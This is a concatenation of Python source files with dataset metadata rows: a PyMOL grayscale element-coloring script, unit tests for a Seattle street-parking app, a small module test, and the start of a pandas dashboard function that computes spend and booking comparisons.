| 20.454545 | 81 | 0.694815 | 118 | 675 | 3.974576 | 0.271186 | 0.085288 | 0.085288 | 0.093817 | 0.837953 | 0.837953 | 0.837953 | 0.837953 | 0.791045 | 0.742004 | 0 | 0.099338 | 0.105185 | 675 | 32 | 82 | 21.09375 | 0.677152 | 0.238519 | 0 | 0.791667 | 0 | 0 | 0.154902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbec8a05205e1072a3e3c6e78e9224cd72818a46 | 10,595 | py | Python | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | # Description: Apply grayscale coloring using a grayscale version of the PyMOL colors for the elements. This is a Python function. It is invoked in a script file via gscale(). There is a corresponding gscale shortcut in pymolshortcuts.py that is invoked in a pml script by entering gsale if the functions in pymolshortcuts.py have been loaded with the run pymolshortcuts.py command.
# Source: https://www.pymolwiki.org/index.php/Symmetry_Axis
"""
cmd.do('def grayscale(selection="all"):')
cmd.do(' """Apply by entering grayscale()"""')
cmd.do(' cmd.color("grey64", "elem Ac")')
cmd.do(' cmd.color("grey67", "elem Al")')
cmd.do(' cmd.color("grey39", "elem Am")')
cmd.do(' cmd.color("grey46", "elem Sb")')
cmd.do(' cmd.color("grey75", "elem Ar")')
cmd.do(' cmd.color("grey58", "elem As")')
cmd.do(' cmd.color("grey33", "elem At")')
cmd.do(' cmd.color("grey56", "elem Ba")')
cmd.do(' cmd.color("grey40", "elem Bk")')
cmd.do(' cmd.color("grey87", "elem Be")')
cmd.do(' cmd.color("grey40", "elem Bi")')
cmd.do(' cmd.color("grey20", "elem Bh")')
cmd.do(' cmd.color("grey77", "elem B")')
cmd.do(' cmd.color("grey26", "elem Br")')
cmd.do(' cmd.color("grey86", "elem Cd")')
cmd.do(' cmd.color("grey76", "elem Ca")')
cmd.do(' cmd.color("grey34", "elem Cf")')
cmd.do(' cmd.color("grey77", "elem C")')
cmd.do(' cmd.color("grey98", "elem Ce")')
cmd.do(' cmd.color("grey17", "elem Cs")')
cmd.do(' cmd.color("grey70", "elem Cl")')
cmd.do(' cmd.color("grey60", "elem Cr")')
cmd.do(' cmd.color("grey64", "elem Co")')
cmd.do(' cmd.color("grey54", "elem Cu")')
cmd.do(' cmd.color("grey42", "elem Cm")')
cmd.do(' cmd.color("grey89", "elem D")')
cmd.do(' cmd.color("grey19", "elem Db")')
cmd.do(' cmd.color("grey79", "elem Dy")')
cmd.do(' cmd.color("grey29", "elem Es")')
cmd.do(' cmd.color("grey67", "elem Er")')
cmd.do(' cmd.color("grey85", "elem Eu")')
cmd.do(' cmd.color("grey28", "elem Fm")')
cmd.do(' cmd.color("grey93", "elem F")')
cmd.do(' cmd.color("grey8", "elem Fr")')
cmd.do(' cmd.color("grey82", "elem Gd")')
cmd.do(' cmd.color("grey60", "elem Ga")')
cmd.do(' cmd.color("grey52", "elem Ge")')
cmd.do(' cmd.color("grey80", "elem Au")')
cmd.do(' cmd.color("grey68", "elem Hf")')
cmd.do(' cmd.color("grey20", "elem Hs")')
cmd.do(' cmd.color("grey96", "elem He")')
cmd.do(' cmd.color("grey75", "elem Ho")')
cmd.do(' cmd.color("grey89", "elem H")')
cmd.do(' cmd.color("grey49", "elem In")')
cmd.do(' cmd.color("grey16", "elem I")')
cmd.do(' cmd.color("grey29", "elem Ir")')
cmd.do(' cmd.color("grey48", "elem Fe")')
cmd.do(' cmd.color("grey65", "elem Kr")')
cmd.do(' cmd.color("grey76", "elem La")')
cmd.do(' cmd.color("grey19", "elem Lr")')
cmd.do(' cmd.color("grey34", "elem Pb")')
cmd.do(' cmd.color("grey60", "elem Li")')
cmd.do(' cmd.color("grey48", "elem Lu")')
cmd.do(' cmd.color("grey83", "elem Mg")')
cmd.do(' cmd.color("grey52", "elem Mn")')
cmd.do(' cmd.color("grey20", "elem Mt")')
cmd.do(' cmd.color("grey23", "elem Md")')
cmd.do(' cmd.color("grey72", "elem Hg")')
cmd.do(' cmd.color("grey62", "elem Mo")')
cmd.do(' cmd.color("grey93", "elem Nd")')
cmd.do(' cmd.color("grey85", "elem Ne")')
cmd.do(' cmd.color("grey43", "elem Np")')
cmd.do(' cmd.color("grey67", "elem Ni")')
cmd.do(' cmd.color("grey69", "elem Nb")')
cmd.do(' cmd.color("grey25", "elem N")')
cmd.do(' cmd.color("grey23", "elem No")')
cmd.do(' cmd.color("grey36", "elem Os")')
cmd.do(' cmd.color("grey44", "elem O")')
cmd.do(' cmd.color("grey33", "elem Pd")')
cmd.do(' cmd.color("grey57", "elem P")')
cmd.do(' cmd.color("grey82", "elem Pt")')
cmd.do(' cmd.color("grey37", "elem Pu")')
cmd.do(' cmd.color("grey40", "elem Po")')
cmd.do(' cmd.color("grey35", "elem K")')
cmd.do(' cmd.color("grey95", "elem Pr")')
cmd.do(' cmd.color("grey90", "elem Pm")')
cmd.do(' cmd.color("grey52", "elem Pa")')
cmd.do(' cmd.color("grey35", "elem Ra")')
cmd.do(' cmd.color("grey46", "elem Rn")')
cmd.do(' cmd.color("grey43", "elem Re")')
cmd.do(' cmd.color("grey39", "elem Rh")')
cmd.do(' cmd.color("grey27", "elem Rb")')
cmd.do(' cmd.color("grey47", "elem Ru")')
cmd.do(' cmd.color("grey19", "elem Rf")')
cmd.do(' cmd.color("grey89", "elem Sm")')
cmd.do(' cmd.color("grey90", "elem Sc")')
cmd.do(' cmd.color("grey20", "elem Sg")')
cmd.do(' cmd.color("grey66", "elem Se")')
cmd.do(' cmd.color("grey80", "elem Si")')
cmd.do(' cmd.color("grey75", "elem Ag")')
cmd.do(' cmd.color("grey46", "elem Na")')
cmd.do(' cmd.color("grey71", "elem Sr")')
cmd.do(' cmd.color("grey76", "elem S")')
cmd.do(' cmd.color("grey60", "elem Ta")')
cmd.do(' cmd.color("grey53", "elem Tc")')
cmd.do(' cmd.color("grey51", "elem Te")')
cmd.do(' cmd.color("grey81", "elem Tb")')
cmd.do(' cmd.color("grey39", "elem Tl")')
cmd.do(' cmd.color("grey59", "elem Th")')
cmd.do(' cmd.color("grey61", "elem Tm")')
cmd.do(' cmd.color("grey48", "elem Sn")')
cmd.do(' cmd.color("grey75", "elem Ti")')
cmd.do(' cmd.color("grey50", "elem W")')
cmd.do(' cmd.color("grey47", "elem U")')
cmd.do(' cmd.color("grey65", "elem V")')
cmd.do(' cmd.color("grey54", "elem Xe")')
cmd.do(' cmd.color("grey55", "elem Yb")')
cmd.do(' cmd.color("grey91", "elem Y")')
cmd.do(' cmd.color("grey51", "elem Zn")')
cmd.do(' cmd.color("grey81", "elem Zr")')
cmd.do('cmd.extend("grayscale",grayscale)')
"""
cmd.do('def grayscale(selection="all"):')
cmd.do(' """Apply by entering grayscale()"""')
cmd.do(' cmd.color("grey64", "elem Ac")')
cmd.do(' cmd.color("grey67", "elem Al")')
cmd.do(' cmd.color("grey39", "elem Am")')
cmd.do(' cmd.color("grey46", "elem Sb")')
cmd.do(' cmd.color("grey75", "elem Ar")')
cmd.do(' cmd.color("grey58", "elem As")')
cmd.do(' cmd.color("grey33", "elem At")')
cmd.do(' cmd.color("grey56", "elem Ba")')
cmd.do(' cmd.color("grey40", "elem Bk")')
cmd.do(' cmd.color("grey87", "elem Be")')
cmd.do(' cmd.color("grey40", "elem Bi")')
cmd.do(' cmd.color("grey20", "elem Bh")')
cmd.do(' cmd.color("grey77", "elem B")')
cmd.do(' cmd.color("grey26", "elem Br")')
cmd.do(' cmd.color("grey86", "elem Cd")')
cmd.do(' cmd.color("grey76", "elem Ca")')
cmd.do(' cmd.color("grey34", "elem Cf")')
cmd.do(' cmd.color("grey77", "elem C")')
cmd.do(' cmd.color("grey98", "elem Ce")')
cmd.do(' cmd.color("grey17", "elem Cs")')
cmd.do(' cmd.color("grey70", "elem Cl")')
cmd.do(' cmd.color("grey60", "elem Cr")')
cmd.do(' cmd.color("grey64", "elem Co")')
cmd.do(' cmd.color("grey54", "elem Cu")')
cmd.do(' cmd.color("grey42", "elem Cm")')
cmd.do(' cmd.color("grey89", "elem D")')
cmd.do(' cmd.color("grey19", "elem Db")')
cmd.do(' cmd.color("grey79", "elem Dy")')
cmd.do(' cmd.color("grey29", "elem Es")')
cmd.do(' cmd.color("grey67", "elem Er")')
cmd.do(' cmd.color("grey85", "elem Eu")')
cmd.do(' cmd.color("grey28", "elem Fm")')
cmd.do(' cmd.color("grey93", "elem F")')
cmd.do(' cmd.color("grey8", "elem Fr")')
cmd.do(' cmd.color("grey82", "elem Gd")')
cmd.do(' cmd.color("grey60", "elem Ga")')
cmd.do(' cmd.color("grey52", "elem Ge")')
cmd.do(' cmd.color("grey80", "elem Au")')
cmd.do(' cmd.color("grey68", "elem Hf")')
cmd.do(' cmd.color("grey20", "elem Hs")')
cmd.do(' cmd.color("grey96", "elem He")')
cmd.do(' cmd.color("grey75", "elem Ho")')
cmd.do(' cmd.color("grey89", "elem H")')
cmd.do(' cmd.color("grey49", "elem In")')
cmd.do(' cmd.color("grey16", "elem I")')
cmd.do(' cmd.color("grey29", "elem Ir")')
cmd.do(' cmd.color("grey48", "elem Fe")')
cmd.do(' cmd.color("grey65", "elem Kr")')
cmd.do(' cmd.color("grey76", "elem La")')
cmd.do(' cmd.color("grey19", "elem Lr")')
cmd.do(' cmd.color("grey34", "elem Pb")')
cmd.do(' cmd.color("grey60", "elem Li")')
cmd.do(' cmd.color("grey48", "elem Lu")')
cmd.do(' cmd.color("grey83", "elem Mg")')
cmd.do(' cmd.color("grey52", "elem Mn")')
cmd.do(' cmd.color("grey20", "elem Mt")')
cmd.do(' cmd.color("grey23", "elem Md")')
cmd.do(' cmd.color("grey72", "elem Hg")')
cmd.do(' cmd.color("grey62", "elem Mo")')
cmd.do(' cmd.color("grey93", "elem Nd")')
cmd.do(' cmd.color("grey85", "elem Ne")')
cmd.do(' cmd.color("grey43", "elem Np")')
cmd.do(' cmd.color("grey67", "elem Ni")')
cmd.do(' cmd.color("grey69", "elem Nb")')
cmd.do(' cmd.color("grey25", "elem N")')
cmd.do(' cmd.color("grey23", "elem No")')
cmd.do(' cmd.color("grey36", "elem Os")')
cmd.do(' cmd.color("grey44", "elem O")')
cmd.do(' cmd.color("grey33", "elem Pd")')
cmd.do(' cmd.color("grey57", "elem P")')
cmd.do(' cmd.color("grey82", "elem Pt")')
cmd.do(' cmd.color("grey37", "elem Pu")')
cmd.do(' cmd.color("grey40", "elem Po")')
cmd.do(' cmd.color("grey35", "elem K")')
cmd.do(' cmd.color("grey95", "elem Pr")')
cmd.do(' cmd.color("grey90", "elem Pm")')
cmd.do(' cmd.color("grey52", "elem Pa")')
cmd.do(' cmd.color("grey35", "elem Ra")')
cmd.do(' cmd.color("grey46", "elem Rn")')
cmd.do(' cmd.color("grey43", "elem Re")')
cmd.do(' cmd.color("grey39", "elem Rh")')
cmd.do(' cmd.color("grey27", "elem Rb")')
cmd.do(' cmd.color("grey47", "elem Ru")')
cmd.do(' cmd.color("grey19", "elem Rf")')
cmd.do(' cmd.color("grey89", "elem Sm")')
cmd.do(' cmd.color("grey90", "elem Sc")')
cmd.do(' cmd.color("grey20", "elem Sg")')
cmd.do(' cmd.color("grey66", "elem Se")')
cmd.do(' cmd.color("grey80", "elem Si")')
cmd.do(' cmd.color("grey75", "elem Ag")')
cmd.do(' cmd.color("grey46", "elem Na")')
cmd.do(' cmd.color("grey71", "elem Sr")')
cmd.do(' cmd.color("grey76", "elem S")')
cmd.do(' cmd.color("grey60", "elem Ta")')
cmd.do(' cmd.color("grey53", "elem Tc")')
cmd.do(' cmd.color("grey51", "elem Te")')
cmd.do(' cmd.color("grey81", "elem Tb")')
cmd.do(' cmd.color("grey39", "elem Tl")')
cmd.do(' cmd.color("grey59", "elem Th")')
cmd.do(' cmd.color("grey61", "elem Tm")')
cmd.do(' cmd.color("grey48", "elem Sn")')
cmd.do(' cmd.color("grey75", "elem Ti")')
cmd.do(' cmd.color("grey50", "elem W")')
cmd.do(' cmd.color("grey47", "elem U")')
cmd.do(' cmd.color("grey65", "elem V")')
cmd.do(' cmd.color("grey54", "elem Xe")')
cmd.do(' cmd.color("grey55", "elem Yb")')
cmd.do(' cmd.color("grey91", "elem Y")')
cmd.do(' cmd.color("grey51", "elem Zn")')
cmd.do(' cmd.color("grey81", "elem Zr")')
cmd.do('cmd.extend("grayscale",grayscale)')
| 45.472103 | 383 | 0.566871 | 1,648 | 10,595 | 3.643811 | 0.141384 | 0.188177 | 0.295754 | 0.47627 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0 | 0.048868 | 0.154035 | 10,595 | 232 | 384 | 45.668103 | 0.621109 | 0.041529 | 0 | 0.982301 | 0 | 0 | 0.872857 | 0.010207 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a53dc7785f692d9051f2ea3d902b2597ee777d79 | 4,499 | py | Python | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | 1 | 2022-01-26T06:22:21.000Z | 2022-01-26T06:22:21.000Z | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | null | null | null | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | 1 | 2021-05-02T07:49:34.000Z | 2021-05-02T07:49:34.000Z | import unittest
from unittest.mock import Mock
from parking_spot import ParkingSpot
from parking_app import create_parking_spots
class StreetParkingUITest(unittest.TestCase):
def test_create_parking_spots_success(self):
n_clicks = 1
destination = "Street0"
accept_distance = "0.2"
cu = Mock()
distance = 0.5
coordinates = [[1.1, 1.2], [1.3, 1.4]]
street_name = "Street Name1"
street_lat_mid = 1.5
street_lon_mid = 1.6
ps1 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
distance = 1.5
coordinates = [[2.1, 2.2], [2.3, 2.4]]
street_name = "Street Name2"
street_lat_mid = 2.5
street_lon_mid = 2.6
ps2 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
spots = [ps1, ps2]
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat1 = data[0]["lat"]
lon1 = data[0]["lon"]
self.assertEqual([lat1, lon1], [[1.1, 1.2], [1.3, 1.4]])
lat2 = data[1]["lat"]
lon2 = data[1]["lon"]
self.assertEqual([lat2, lon2], [[2.1, 2.2], [2.3, 2.4]])
lat3 = data[2]["lat"][0]
lon3 = data[2]["lon"][0]
self.assertEqual([lat3, lon3], [3.1, 3.2])
def test_create_parking_spots_button_not_clicked(self):
n_clicks = 0
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_invalid_address(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
distance = 0.5
coordinates = [[1.1, 1.2], [1.3, 1.4]]
street_name = "Street Name1"
street_lat_mid = 1.5
street_lon_mid = 1.6
ps1 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
distance = 1.5
coordinates = [[2.1, 2.2], [2.3, 2.4]]
street_name = "Street Name2"
street_lat_mid = 2.5
street_lon_mid = 2.6
ps2 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
spots = [ps1, ps2]
destination_coordinates = None
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_invalid_spots_returned(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
spots = None
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_no_spots_available(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
spots = []
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
if __name__ == "__main__":
unittest.main()
| 30.815068 | 76 | 0.556568 | 531 | 4,499 | 4.472693 | 0.129944 | 0.075789 | 0.083368 | 0.042105 | 0.839158 | 0.798737 | 0.798737 | 0.798737 | 0.792 | 0.792 | 0 | 0.047415 | 0.324961 | 4,499 | 145 | 77 | 31.027586 | 0.734607 | 0 | 0 | 0.769912 | 0 | 0 | 0.0489 | 0 | 0 | 0 | 0 | 0 | 0.061947 | 1 | 0.044248 | false | 0 | 0.035398 | 0 | 0.088496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a5624ffe0302df36c8bf9a06a49d13a237a5f471 | 134 | py | Python | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | 4 | 2021-11-26T21:39:17.000Z | 2022-03-04T09:32:07.000Z | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | 1 | 2021-11-30T20:28:10.000Z | 2021-12-01T01:03:28.000Z | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | null | null | null | from . import sample
def test_current_module():
assert sample is sample.__module__
assert sample is not sample.get_module()
| 19.142857 | 44 | 0.753731 | 19 | 134 | 4.947368 | 0.578947 | 0.255319 | 0.382979 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186567 | 134 | 6 | 45 | 22.333333 | 0.862385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a58bcbbf0ad35b031c46f56376c4cd4d420593e5 | 54,722 | py | Python | components/functions.py | kbhartiya/Covid19-Tracker-DashApp | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | 2 | 2020-04-16T17:03:45.000Z | 2020-09-29T21:38:23.000Z | components/functions.py | kbhartiya/Covid19-Tracker | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | null | null | null | components/functions.py | kbhartiya/Covid19-Tracker | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | null | null | null | '''
from datetime import datetime as dt
from datetime import date, timedelta
from datetime import datetime
import plotly.graph_objs as go
from plotly import tools
import numpy as np
import pandas as pd
pd.options.mode.chained_assignment = None
# Read in Travel Report Data
df = pd.read_csv('data/performance_analytics_cost_and_ga_metrics.csv')
df.rename(columns={
'Travel Product': 'Placement type',
'Spend - This Year': 'Spend TY',
'Spend - Last Year': 'Spend LY',
'Sessions - This Year': 'Sessions - TY',
'Sessions - Last Year': 'Sessions - LY',
'Bookings - This Year': 'Bookings - TY',
'Bookings - Last Year': 'Bookings - LY',
'Revenue - This Year': 'Revenue - TY',
'Revenue - Last Year': 'Revenue - LY',
}, inplace=True)
df['Date'] = pd.to_datetime(df['Date'])
current_year = df['Year'].max()
current_week = df[df['Year'] == current_year]['Week'].max()
now = datetime.now()
datestamp = now.strftime("%Y%m%d")
columns = ['Spend TY', 'Spend LY', 'Sessions - TY', 'Sessions - LY', 'Bookings - TY', 'Bookings - LY', 'Revenue - TY', 'Revenue - LY']
# Define Formatters
def formatter_currency(x):
return "${:,.0f}".format(x) if x >= 0 else "(${:,.0f})".format(abs(x))
def formatter_currency_with_cents(x):
return "${:,.2f}".format(x) if x >= 0 else "(${:,.2f})".format(abs(x))
def formatter_percent(x):
return "{:,.1f}%".format(x) if x >= 0 else "({:,.1f}%)".format(abs(x))
def formatter_percent_2_digits(x):
return "{:,.2f}%".format(x) if x >= 0 else "({:,.2f}%)".format(abs(x))
def formatter_number(x):
return "{:,.0f}".format(x) if x >= 0 else "({:,.0f})".format(abs(x))
# First Data Table Update Function
def update_first_datatable(start_date, end_date, category, aggregation):
if start_date is not None:
start_date = dt.strptime(start_date, '%Y-%m-%d')
start_date_string = start_date.strftime('%Y-%m-%d')
if end_date is not None:
end_date = dt.strptime(end_date, '%Y-%m-%d')
end_date_string = end_date.strftime('%Y-%m-%d')
days_selected = (end_date - start_date).days
prior_start_date = start_date - timedelta(days_selected + 1)
prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
prior_end_date = end_date - timedelta(days_selected + 1)
prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
if aggregation == 'Placement type':
df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
elif aggregation == 'GA Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'GA Category':'Placement type'}, inplace=True)
elif aggregation == 'Birst Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'Birst Category':'Placement type'}, inplace=True)
# Calculate Differences on-the-fly
df_by_date_combined['Spend PoP (%)'] = np.nan
df_by_date_combined['Spend YoY (%)'] = np.nan
df_by_date_combined['Sessions PoP (%)'] = np.nan
df_by_date_combined['Sessions YoY (%)'] = np.nan
df_by_date_combined['Bookings PoP (%)'] = np.nan
df_by_date_combined['Bookings YoY (%)'] = np.nan
df_by_date_combined['Revenue PoP (%)'] = np.nan
df_by_date_combined['Revenue YoY (%)'] = np.nan
df_by_date_combined['Spend_PoP_abs_conditional'] = df_by_date_combined['Spend PoP (Abs)'] = ((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP']))
# Formatter
df_by_date_combined['Spend PoP (Abs)'] = df_by_date_combined['Spend PoP (Abs)'].apply(formatter_currency)
df_by_date_combined['Spend_PoP_percent_conditional'] = df_by_date_combined['Spend PoP (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend - LP'] != 0),\
(((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP'])/df_by_date_combined['Spend - LP']) * 100), df_by_date_combined['Spend PoP (%)'])
# Formatter
df_by_date_combined['Spend PoP (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend - LP'] != 0),\
df_by_date_combined['Spend PoP (%)'].apply(formatter_percent), df_by_date_combined['Spend PoP (%)'])
df_by_date_combined['Spend_YoY_percent_conditional'] = df_by_date_combined['Spend YoY (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend LY'] != 0),\
((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend LY'])/df_by_date_combined['Spend LY']) * 100, df_by_date_combined['Spend YoY (%)'])
# Formatter
df_by_date_combined['Spend YoY (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend LY'] != 0),\
df_by_date_combined['Spend YoY (%)'].apply(formatter_percent), df_by_date_combined['Spend YoY (%)'])
df_by_date_combined['Sessions_PoP_percent_conditional'] = df_by_date_combined['Sessions PoP (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LP'])/df_by_date_combined['Sessions - LP']) * 100, df_by_date_combined['Sessions PoP (%)'])
# Formatter
df_by_date_combined['Sessions PoP (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
df_by_date_combined['Sessions PoP (%)'].apply(formatter_percent), df_by_date_combined['Sessions PoP (%)'])
df_by_date_combined['Sessions_YoY_percent_conditional'] = df_by_date_combined['Sessions YoY (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LY'])/df_by_date_combined['Sessions - LY']) * 100, df_by_date_combined['Sessions YoY (%)'])
# Formatter
df_by_date_combined['Sessions YoY (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
df_by_date_combined['Sessions YoY (%)'].apply(formatter_percent), df_by_date_combined['Sessions YoY (%)'])
df_by_date_combined['Bookings_PoP_abs_conditional'] = df_by_date_combined['Bookings PoP (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])
# Formatter
df_by_date_combined['Bookings PoP (Abs)'] = df_by_date_combined['Bookings PoP (Abs)'].apply(formatter_number)
df_by_date_combined['Bookings_YoY_abs_conditional'] = df_by_date_combined['Bookings YoY (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])
# Formatter
df_by_date_combined['Bookings YoY (Abs)'] = df_by_date_combined['Bookings YoY (Abs)'].apply(formatter_number)
df_by_date_combined['Bookings_PoP_percent_conditional'] = df_by_date_combined['Bookings PoP (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LP'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])/df_by_date_combined['Bookings - LP'] * 100, df_by_date_combined['Bookings PoP (%)'])
# Formatter
df_by_date_combined['Bookings PoP (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LP'] != 0),\
df_by_date_combined['Bookings PoP (%)'].apply(formatter_percent), df_by_date_combined['Bookings PoP (%)'])
